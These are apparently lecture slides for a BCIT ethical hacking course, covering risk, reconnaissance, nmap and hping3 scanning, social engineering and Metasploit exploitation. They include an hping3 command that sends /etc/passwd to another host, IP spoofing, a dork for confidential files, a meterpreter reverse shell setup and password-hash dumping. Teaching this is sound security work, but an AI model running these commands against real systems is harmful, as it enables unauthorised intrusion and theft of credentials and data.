XFSC 7021

Day 1 – Ethical Hacking, Kali Linux, Recon and Social Engineering

 Course Mechanics
2 Weeks
See Course Outline for Specifics (https://www.bcit.ca/outlines/20233049070 )
Grade Breakdown
Final Quiz 100% (Day 2)
All course content and assignment submissions in D2L: https://learn.bcit.ca/
Instructor Email: klalji1@bcit.ca (please don’t use my my.bcit.ca address)
Assessing Risk
 Risk
Risk is a very loosely used term in information security
Risk is a calculated value – a measure of potential harm
In order for there to be a risk, two things are needed:
Asset – something of value worth protecting
Threat – a condition, event, or person that could pose harm to an asset
Threats can be intentional (eg: launching an exploit), or unintentional (eg: accidental deletion)

Vulnerability: a weakness that could result in harm to an asset

Control: a countermeasure placed in front of a vulnerability to reduce or eliminate it’s
impact
 Determining Risk
Is there a risk?

RISK = Asset * Threat * Vulnerability

All three must be present

Which one can we control?

RISK = Likelihood x Impact

Likelihood = how likely is this threat to occur

Impact = how bad would it be if this threat became realized

What is the risk of an asteroid hitting the earth next week?

How about someone performing a password guessing attack on an internet-facing web app?
Ethical Hacking
 What is a (Malicious) Hacker?
Goals? Skill Levels?
Ego Gratification Script Kiddie
Political Motivation Novice Hackers
Socio Economic Motivation Skilled Hackers
Financially Motivated Organized Crime Hackers
Criminal Motivation Nation State Level Hackers
 What about Ethical Hacking?
Same tools, techniques, and Comes in many shapes and forms
processes Vulnerability Assessments
Primary differences? Penetration Testing
Intent Red/Purple Teams
Permission! Physical Assessments
Used to show an organization Social Engineering
their risk posture against a
motivated and skilled adversary
Ethical Hacking – Vulnerability Assessments
Assess vulnerabilities at a wider range
Eg: Scan a /24 IP range
Not a replacement for in depth security assessments (eg: Penetration Testing)
Can be network based, web based, or cloud based
Generally relies on automated tools
Known exploits ie: CVE’s (Common Vulnerabilities and Exposures)
Usually report some kind of score/metric
Common Vulnerability Scoring System (CVSS)
Network Scanners: Nessus, Qualys, OpenVAS, Nmap
Web Scanners: Acunetix, Fortify by Microfocus, Burp Suite, OWASP ZAP
“Mile High and Inch Deep”
 Ethical Hacking – Penetration Testing
Simulate the actions of a malicious threat actor
Generally a smaller scope (eg: specific network range, or an application)
Important not to violate scope as this is a limited exercise for many reasons
Can target networks, web apps, mobile apps, wireless networks, cloud systems
If a pentest relies exclusively on automated tools, it’s not a pentest
The only difference between a hacker and a pen tester is PERMISSION
Be careful with 3rd party systems
Can you test the Microsoft Office 365 login page?
What about an e-commerce website that integrates with a 3rd party payment solution?
Take caution with Denial of Service (DoS) especially in production
Ethical Hacking – Penetration Testing Methodology
 Types of Penetration Testing
Black Box
Very little or no knowledge of the system (same view and access as an external attacker)
White Box
Significant knowledge of the system (same view and access as an internal staff)
May include system diagrams, network ranges, and even credentials to systems
Grey Box
Somewhere in between Black Box and White Box

Which one is better, and why?

Traditionally, companies always wanted Black Box, however they are paying a consultant for each day they spend.
It’s more cost-effective to provide some information up front and get the most value from a pentest.
Remember: the average pentest lasts 1-2 week, real attackers have all the time in the world.
 Ethical Hacking – Red Team
Simulates the actions of an advanced adversary
Less structured with a much broader scope (can last months or more)
Goals are 2 fold:
Determine an organization’s ability to protect themselves against an advanced adversary utilizing
stealth methods
Assess the organizations capability to detect and respond to an active threat
Sometimes referred to as a purple team as the offensive team (red team) will conduct the
attacking while the defensive team (blue team) will attempt to detect and block
 Hacking Tools
Scanners OS Distributions Exploit Frameworks
Nmap Most popular: Kali Linux Metasploit Framework
Nessus BlackBuntu CORE Impact ($$)
Qualys BlackBox Immunity Canvas ($$)
OpenVAS Parrot Security OS Cobalt Strike ($$)
Burp Samurai Web Testing Framework
ZAP
Nikto
Many others

100’s of open source frameworks and tools to use. Remember tools are just that, they are ‘tools’. More
important to understand the techniques and then find the appropriate tool for the job.
Reconnaissance
 Active vs. Passive Recon
Reconnaissance is an important part of any penetration test but often skipped due to being
less ‘exciting’
Used to gather information about a target
Passive reconnaissance gathers information without touching the actual target
Eg: Open Source Intelligence (OSINT), WhoIs records, DNS Records (such as querying public
servers), Passive Packet Captures
Active reconnaissance gathers information but results in the target being probed
DNS brute forcing, port scanning, service enumeration, web directory brute forcing
Active DNS and web enumeration often use wordlists to find common paths or subdomains eg:
admin.bcit.ca, blog.bcit.ca, shop.bcit.ca etc…
 DNS
DNS seems like a very simple thing but can be extremely useful in planning attacks
Discover alternate hosts in the environment
Get an understanding about the underlying network layout
Gather information about subdomains or other interesting hosts
Eg: admin.company.com may not be searchable on google, but could be found with enumeration
Various record types, some of the more common ones include:
A – host address which maps a name (eg: google.com) to an IP address
PTR – a reverse record which maps an IP address back to a name
MX –mail exchanger records
NS – specifies which name servers are authoritative for a domain
CNAME – canonical name (basically an alias)
TXT - free form text record which often contains ‘extra’ information (useful to attackers)
 Dig and NSLookup
Simple lookup :
Simple lookup :
dig bcit.ca
Lookup Name Servers nslookup bcit.ca
dig @8.8.8.8 bcit.ca NS Lookup Name Servers
Lookup using external DNS Server.
nslookup -type=ns
dig @8.8.8.8 bcit.ca
Lookup MX record Lookup using external DNS Server.
dig @8.8.8.8 bcit.ca MX nslookup redhat.com
Lookup CNAME record ns1.redhat.com
dig @8.8.8.8 bcit.ca CNAME Lookup MX record
Lookup TXT record
nslookup -query=mx
dig @8.8.8.8 bcit.ca TXT
 WhoIs Records
Query the ownership of
domains and IP addresses
based on the records
contained in ICANN
(Internet Corporation of
Assigned Names and
Numbers)
Can be quite useful in the
reconnaissance phase to
determine asset ownership
and other information such
as contacts and email
address format
 Open Source Intelligence (OSINT)
People and organizations have a wealth of information online
Includes website data, search engines, social media, documents, metadata, and 3rd party websites
Lots of valuable data just sitting there but needs to be gathered and correlated
OSINT leverages public information sources to gather this information
OSINT is passive since you are not actually ‘touching’ the target
The biggest challenge is often correlation
How do you link information gathered from the company website, with google searches, and
personal social media accounts?
OSINT tools can help, but manual customization often required
 OSINT – Google Dorks
An excellent passive reconnaissance technique is Google
Google has specialized search queries that can be used to find specific targets
Small set of examples:
site: → Search results only from a specific site
inurl: → Search specific elements inside the URL Careful
not to get
intitle: → Search for a particular page title
shunned
“search” → Search must contain the term in quotes
cache: → Search cached content
ext: → Search for specific file extensions
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary |
intext:"budget approved") inurl:confidential
List of Google Dorks: https://www.exploit-db.com/google-hacking-database
 OSINT – Document Metadata
When a document is created, default ‘metadata’ is stored with that file
Security aware organizations remove these items
Many tools exist to help extract metadata
One such tool is ‘exiftool’ built into Kali Linux
Some documents contain juicy information such as authors, and last modified by
Could also contain OS and software versions
The power of metadata starts to show when many documents are analyzed together and
correlated which starts to tell a story…
OSINT - Maltego
Free and commercial
versions
Used to find links between
various entities such as
email addresses and
domains
Utilizes “transforms” to
find various associations
Can be weird to use at first
but very useful
 OSINT – Recon-NG
Automated reconnaissance
module with many features
Leverages several other
tools, API’s and features
May require API keys for
3rd party searching
Eg: google dorking
without getting shunned

Built into Kali Linux

# recon-ng
[recon-ng][default] > marketplace search
Shodan
Search engine for Internet of
Things (IoT)
Searches and indexes internet
connected devices similar to
how google indexes webpages
Free and paid versions
Great for findings
unauthenticated web cams,
servers, and other devices
https://www.shodan.io/
Scanning/Enumeration
 Port Scanning
Port scanning contains various “sub activities” such as:
Ping sweeps: Sending ICMP packets to hosts to determine if they are alive
Enumerating hosts to determine what services are listening
Gather a list of ports and their status
Open Ports, Closed Ports, Filtered (Firewalled) Ports
Scan TCP and UDP
Which scan technique would be faster between TCP and UDP?
Various scan types “TCP Connect”, “SYN Scan”, “FIN Scan”, “Null”, “XMAS”
 Normal 3 Way Handshake
SYN

SYN/ACK

ACK

FIN

Receiver
Sender

FIN/ACK

ACK

RST

ACK
 TCP “SYN” Scan

SYN
Attacker/Sender

SYN/ACK

Receiver
RST

• Attacker sends a SYN to the destination as ‘usual’

• If the port is closed, an RST should be received
• If the port is open, a SYN/ACK should be received
• Instead of the attacker sending a final ACK to complete the
connection, they simply respond with an RST
 TCP “FIN” Scan

FIN

RST (Closed) | Nothing (Open)

Attacker/Sender

Receiver
• Attacker sends a FIN to the destination
• If the port is open, no response should be received
• The attacker is trying to FIN an invalid connection
• If the port is closed, an RST should be received
 TCP “NULL” Scan

No Flags

RST (Closed) | Nothing (Open)

Attacker/Sender

Receiver
• Attacker sends a packet with no TCP flags set
• If the port is open, no response should be received
• The attacker is sending a TCP connection with invalid (no) flags
• If the port is closed, an RST should be received
 TCP “XMAS” Scan

FIN/PSH/URG

RST (Closed) | Nothing (Open)

Attacker/Sender

Receiver
• Attacker sends a FIN/PSH/URG to the destination
• If the port is open, no response should be received
• The attacker is sending a TCP connection with a combination of
flags that don’t make sense
• If the port is closed, an RST should be received
• This technique does not work against Windows systems
 Nmap
One of the most popular open source port scanners
Lots of features, both simple and complex
Used to enumerate hosts, scan ports, interrogate services and perform light vulnerability
scanning
Graphical version known as Zenmap
Nmap has a host which can be scanned to learn the tool and get practice:
scanme.nmap.org
Various switches, and options, which are covered next (this is barely scratching the surface)
 Nmap

Scan Types Output Options Advanced Features

TCP Connect Scan Text Output Service Scans
nmap 192.168.1.0/24
nmap 192.168.1.1 -oN output.txt nmap –sC
SYN Scan
nmap –sS 192.168.1.1-10
Grepable Output Version Information
FIN Scan nmap 192.168.1.1 –oG out.gnmap nmap -sV

nmap –sF 192.168.1.1 XML Output Operating System Fingerprinting

XMAS Scan nmap 192.168.1.1 –oX out.xml nmap –O
nmap –sX 192.168.1.1
Parsing All In One
Specific Ports
Grep, Sed, Awk, Cut nmap –A (-sC –sV –O + traceroute)
nmap –sS –p 80,443,21-25
UDP Scans Nmap NSE Scripts
nmap –sU –p 53 nmap -sV --script=http-enum <IP>
 Hping3
Hping3 is a network tool used to send custom packets (such as ICMP/TCP/UDP)
Useful when a basic ‘ping’ for example isn’t sufficient
Customizations can include:
Setting specific TCP flags (SYN/PSH/FIN/ACK/URG etc…)
Setting specific source and destination ports for TCP/UDP
Customized ICMP host discovery
Packet sniffing
Source IP spoofing
Spoofing is generally used to perform denial of service attacks or mask the true origin of a scan
Denial of service could be against the ‘target’ or the ‘spoofed IP’ – think about where the responses go!
In order to hide the true origin of the attack but still receive responses, the attacker IP will need to be included in the spoofed
list
The attacker will not receive responses to the packet as the receiver responds to the spoofed IP
 Hping3 – IP Spoofing Visualized
SYN with spoofed IP
192.168.1.5
192.168.1.4

SYN-ACK goes to
192.168.1.5
Decoy Scan
• SYN: SRC = 192.168.1.6 DST = 192.168.1.4
192.168.1.3 • SYN: SRC = 192.168.1.8 DST = 192.168.1.4
• SYN: SRC = 192.168.1.12 DST = 192.168.1.4
• SYN: SRC = 192.168.1.14 DST = 192.168.1.4
• SYN: SRC = 192.168.1.3 DST = 192.168.1.4

192.168.1.5
SYN-ACK sent back to 192.168.1.3 (attacker)
The attacker cannot see the others, but masks the attack origin 36
 Hping3 - Examples
Scanning
TCP SYN Scan
hping3 -S 10.10.10.1 -p 80 -c 1
TCP ACK Scan
hping3 –A 10.10.10.1 -p 80 -c 1
Host Discovery
hping3 -1 10.0.0.x --rand-dest -I eth0
ICMP Scanning
hping3 -1 192.168.1.1 -C 13
-1 = ICMP, -C 13 (timestamp)
Spoofing/Sniffing
Spoof sending IP
hping3 –S <target> -a <spoofed>
Intercept/Sniff HTTP
hping3 -9 HTTP -I eth0
Intercept/Sniff HTTP Specific
hping3 -9
"http://www.google.com/search?" --
beep -I eth0
Advanced
Send using a random source (decoy)
--rand-source
File Transfer
hping3 -1 192.168.1.100 -9 signature
-I eth0 (Receiver)
hping3 -1 192.168.1.101 -e signature
-E /etc/passwd -d 2000 (Sender)
Need more?
https://www.kali.org/tools/hping3
Or ‘man hping3’ from terminal
Vulnerability Scanning - Nessus
Commercial vulnerability
scanning tool
Widely used by many
organizations and consulting
firms
Scans can be targeted at
network ranges, web apps*
and other devices
Signatures and CVE’s
updated regularly
Advanced features such as
agents, and API connections
Vulnerability Scanning - OpenVAS
Free vulnerability scanner
which is a “branch” of
Nessus
~26K CVE’s compared to
~66K in Nessus in 2021
Fewer plugins and
templates
Good for personal
scanning or smaller orgs
 Understanding Scan Results
Vulnerability scanning requires manual “triage” to be considered effective
Scanners are simply tools, humans need to determine the true risk to an organization
False Positive
A control wrongly prevents legitimate activity.
Too many of these creates “fatigue” and “true positives” may slip through.
False Negative
A control wrongly allows illegitimate activity.
True Positive
A control correctly identifies or blocks illegitimate activity
True Negative
A control correctly identifies and allows legitimate activity

Which one is the most dangerous?

Social Engineering
 Social Engineering Intro
Social engineering is the psychological manipulation of human behavior
Most well-known technique is “Phishing” however many others exist
Spear Phishing: Phishing attacks targeting specific people/organizations
Voice Phishing: Phishing attacks that utilize a phone call (CRA scammers)
SMS Phishing: Phishing attacks executed over an SMS message
Tail Gating – following someone into a secured area
“Sweet Talking” – utilizing convincing rhetoric to gain access to secured areas
 Social Engineering Techniques
Scarcity – people want something which is scarce (limited quantity)
Urgency – utilizing marketing like techniques ie: 20% off today only
Authority – such as RCMP or Canada Revenue Agency
Intimidation – threaten the victim or use blackmail
Phishing Case Study
These emails often contain
the user’s actual password.
Intimidation tactics
How did the attacker
obtain this?
Social Engineering at Defcon
Social Engineering Toolkit (SET)
Automated toolkit built into
Kali Linux used to assist in
technical social engineering
attacks
Various modules to create
phishing landing pages, clone
websites etc…
Usually combined with another
attack technique such as MiTM
(Man in the Middle)
Exploitation Intro
 Vulnerabilities
Vulnerabilities are weaknesses within a system
Some vulnerabilities are simple and can be exploited by using simple logic
Eg: a website displaying an invoice with http://mywebsite.com/invoices/id=2 (change id=3, etc…)
Example of a simple logic vulnerability
Others are more complex, potentially due to insufficient memory management
Eg: a program on Windows does not handle memory correctly allowing a debugger to be attached and
exploit code (shell code) to be written
Likely requires complex shellcode or assembly to be injected using DLL hooking

Vulnerabilities are mitigated using controls which usually involves some kind of patching
Eg: When Microsoft discovers a bug/security weakness they release a patch
 Exploits
A vulnerability is simply a discovered weakness, exploits take advantage of those
weaknesses usually for the purpose of performing some type of malicious action
Example – CVE-2019-0708 (Vuln in MS RDP – Blue Keep)

 MS Advisory

Exploit Code from

exploit-db.com →
 Payloads
An exploit takes advantage of a vulnerability, but most of the time an attacker wants to
actually do something such as:
Steal data
Obtain a shell
Implant a backdoor
This is accomplished using a ‘Payload’ of some kind which could be used to obtain a shell,
add user accounts, exfiltrate data, establish other persistence mechanisms, or load malware
Once an exploit has been launched, a payload is usually sent
Think of an exploit like opening a door, and a payload was walking through it
Various payload types will be discussed in this course
 Shells
Often our payloads are going to be in the form of ‘Shells’
These are command interpreters or tunnels built between the victim or attacker machines
Shells can be established in a couple of ways:
Reverse Shell
The compromised (victim) system sends a shell to the attacker
Advantageous when an inbound firewall rule could be preventing ingress connections
In this case, the shell is sent by the victim to the attacker (so no inbound firewall rules needed)
Bind Shell
The attacker system connects to a shell inbound to the compromised system (victim)
Think of an attacker connecting to a victim system over SSH (port 22) and getting a shell
 Putting it Together

Vulnerability • Eg: Blue Keep

Exploit • Shellcode Crafted into Exploit

Payload • RDP Shell Obtained

 Nikto Web Application Scanner
• Nikto is a popular and open source web configuration and vulnerability scanner

Nikto can check for several web vulnerabilities:

• Misconfigurations
• Exposed Directories
• Directory Traversal Flaws
• Default Files / Backup Files
• Well-known vulnerabilities (ie: CVE’s)

53
 HTTP Interception Proxies
• Web app testing requires a unique set of tools
• HTTP Interception Proxies
• Commonly used by penetration testers in web application assessments
• Burp Suite and OWASP’s ZAP are by far the most common
• Used to intercept communication between a web browser and a destination website
• Easy to bypass client based restrictions ie: JavaScript since the HTTP traffic has already left the
browser
 Automated Exploitation Frameworks
Hackers and security consultants often leverage automated exploitation frameworks
Exploit code is ported over to a tool, and can be launched against a target using point and
click methods
Good for security consultants to test vulnerabilities
Also allows script kiddies and malicious threat actors to exploit systems with more ease
Most popular open source tool is the Metasploit Framework
Commercial tools also exist
 Metasploit Framework
Metasploit framework (MSF) has a large number of built in exploits
Built and maintained by Rapid7
Allows automated exploitation of a target without needing to understand how the exploit
code works
When a vulnerability is released, exploit code can be easily ported into MSF
Separates exploit and payload allowing the target to be exploited using a known
vulnerability followed by loading/injecting a payload of choice
Metasploit has a commercial offering (Metasploit Pro)
 Metasploit Commands
msfconsole → Launch Metasploit with Kali Linux
search → Search for an exploit
Eg “search IE 8” or “search Adobe CVE-XXX”
use → Use an exploit
set → used to set various configurable settings within the framework
set payload → choose a specific payload
set VarName → many exploits and payloads have specific values that need to be set
help → Show help information
show → Show’s the info for a specific exploit or payload and the required variables
More Help: https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
 Metasploit Exploits
Exploits in Metasploit are stored in the ‘exploit’ folder
The subfolder is the platform which could be ‘windows’, ‘linux’, ‘android’ and ‘multi’ (among others)
‘multi’ contains platform/OS independent exploits such as HTTP, FTP, SSH etc..
TAB completion → exploit/windows/ + TAB shows all the available windows exploits
For example, if a vulnerability scan identifies a windows XP host is vulnerable to the NetAPI
vulnerability in MS08-067 (pretty much obsolete now)
We could run the following from the MSF prompt
msf > use exploit/windows/smb/ms08_067_netapi
To see the types of victim systems supported type (after selecting the exploit): show targets
To see the types of payloads that are supported type: show payloads
To see what options are required type: show options
 Metasploit Payloads
Remember that exploits and payloads are separate things
Exploits take advantage of a vulnerability but payloads actually provide you with functionality
MSF separates exploits and payloads so developers can write exploits independent of a payload
Metasploit has a number of payloads supported on various platforms such as Windows,
Linux, PHP, Java
The most common payload is Meterpreter
Windows: windows/meterpreter/reverse_tcp
Recall that a reverse shell means the victim connects back to the attacker
If we want to make a connection to the victim use the bind_tcp option instead
Meterpreter shells are also provided for Linux, PHP, Java etc… with limited features
 Metasploit’s Meterpreter
Meterpreter is MSF’s most powerful backdoor
If Meterpreter is running as a reverse TCP shell, 2 options will be required
LHOST → Your IP address where the victim should connect (the attacker IP)
LPORT → The port you want to listen on for the victim to connect (attacker port)
When you launch Meterpreter, your system will begin listening on this chosen port
By default, Meterpreter uses TCP Port 4444
Many organizations block this port, but it’s trivial to bypass by simply choosing an alternative port
RHOST/RPORT → this is the victim IP/port (ie: where you found the vulnerable service)
Once the exploit and payload have been set
The attack process can be launched by running ‘exploit’ or ‘run’ from the msf> prompt 4
The ‘L’ in LHOST/LPORT indicates ‘Local’ whereas the ‘R’ in RHOST/RPORT indicates ‘Remote’
MSF Exploit + Payload
Exploit Module Options:

• RHOST: The Victim IP

• RPORT: The Victim Port (where the service
is running)
• Exploit specific options

Payload Options:

• LHOST: The Attacker IP

• LPORT: The Attacker Port (where MSF
will listen)
• Payload specific options

Use the ‘set’ command to set variable values

Use the ‘run’ command to launch

 MSF Background Jobs
If you need exploit multiple systems, a meterpreter session can be placed into the background
From the meterpreter> prompt run ‘background’
To see a list of sessions type ‘sessions’ → sessions will be numbered
To interact with a session type meterpreter> sessions –i N
Where N is the session you want to bring into the foreground
 Process Migration
Exploitation of a particular application gets tied/linked to
that application/process ID
The exploit injects malicious code into the memory process of
that application
Eg: if an attacker exploits Internet Explorer and get’s a
meterpreter shell, then the user closes IE, what happens to the
shell?
Backdoor is gone!
Metasploit has a migrate feature where we can port our
existing access into a more stable and potentially more
privileged area of the system
Good processes to migrate to on Windows would be things like
explorer.exe or svchost.exe
Use ‘ps’ from Meterpreter to see running processes on the victim
machine and then run ‘migrate’ to move the shell to that new
process (PID or process name)
 Dumping Password Hashes
Meterpreter has built in modules to dump password hashes from the host
These are local system passwords, not domain passwords
Password hashes can then be cracked offline (more on this later)
 Auxiliary Modules
Metasploit also contains a number of scanning/fuzzing/enumeration functions known as
auxiliary modules
These are usually less full featured than true vulnerability scanners but can be very useful
when testing a targeted system or attack type
For example, to brute force web directories over HTTP use:
use auxiliary/scanner/http/dir_scanner (needs a wordlist of directory names)

https://www.offensive-security.com/metasploit-unleashed/auxiliary-module-reference/

Image Source: offensive-security.com

 Vulnerable VM’s
Rapid7 has created intentionally vulnerable VM’s used to help students practice security
testing without using live hosts
These VM’s have a number of known vulnerabilities that have been embedded intentionally
to practice using some of our tools such as Nmap and Metasploit
One such VM is Metasploitable2
There are several others from different vendors as well

WARNING!
These are very vulnerable systems. DO NOT install on your company network or expose to
the internet as it will very likely get attacked.
 Our Setup
Our attacking systems will run on a Kali VM
Our victim systems will be running a Metasploitabe2 VM

KALI VM Vuln VM
192.168.1.5 192.168.1.8

We will need to run both VM’s to execute our attack scenarios

Recommended to also replicate this setup at home on your computers using VMWare
Make sure your VM networking is set to ‘Bridged’ and not ‘NAT’